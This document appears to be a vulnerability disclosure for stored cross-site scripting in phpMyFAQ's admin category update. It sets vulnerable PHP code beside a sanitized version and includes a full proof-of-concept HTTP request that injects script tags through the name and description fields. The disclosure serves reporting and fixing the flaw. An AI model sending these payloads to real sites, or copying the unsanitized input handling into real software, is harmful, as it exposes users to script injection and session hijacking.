Description

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Proof of Concept

Code That has a Vulnerability:

            // Updates an existing category
            if ($action === 'updatecategory' && Token::getInstance()->verifyToken('update-category', $csrfToken)) {
                $category = new Category($faqConfig, [], false);
                $category->setUser($currentAdminUser);
                $category->setGroups($currentAdminGroups);

                $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                $categoryId = Filter::filterInput(INPUT_POST, 'id', FILTER_VALIDATE_INT);
                $categoryLang = Filter::filterInput(INPUT_POST, 'catlang', FILTER_UNSAFE_RAW);
                $existingImage = Filter::filterInput(INPUT_POST, 'existing_image', FILTER_UNSAFE_RAW);
                $image = count($uploadedFile) ? $categoryImage->getFileName(
                    $categoryId,
                    $categoryLang
                ) : $existingImage;

                $categoryData = [
                    'id' => $categoryId,
                    'lang' => $categoryLang,
                    'parent_id' => $parentId,
                    'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_UNSAFE_RAW),
                    'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_UNSAFE_RAW),
                    'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                    'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                    'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                    'image' => $image,
                    'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT),
                ];

Code without that vulnerability:

            // Save a new category
            if ($action === 'savecategory' && Token::getInstance()->verifyToken('save-category', $csrfToken)) {
                $category = new Category($faqConfig, [], false);
                $category->setUser($currentAdminUser);
                $category->setGroups($currentAdminGroups);
                $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                $categoryId = $faqConfig->getDb()->nextId(Database::getTablePrefix() . 'faqcategories', 'id');
                $categoryLang = Filter::filterInput(INPUT_POST, 'lang', FILTER_UNSAFE_RAW);
                $categoryData = [
                    'lang' => $categoryLang,
                    'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_SANITIZE_SPECIAL_CHARS),
                    'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_SANITIZE_SPECIAL_CHARS),
                    'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                    'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                    'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                    'image' => $categoryImage->getFileName($categoryId, $categoryLang),
                    'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT)
                ];

Request:

POST /admin/?action=updatecategory HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=EDITthis; pmf_sid=11; cookieconsent_status=dismiss
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14208207025422371582565391486
Content-Length: 1934
Origin: https://roy.demo.phpmyfaq.de
Referer: https://roy.demo.phpmyfaq.de/admin/?action=editcategory&cat=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="id"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="catlang"

en
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="parent_id"

0
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="csrf"

EDITthis
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="existing_image"


-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="name"

<script>alert(1)</script>
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="description"

</textarea><script>alert(2)</script>
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="active"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="show_home"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="user_id"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="grouppermission"

all
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="userpermission"

all
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="restricted_users"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="submit"


-----------------------------14208207025422371582565391486--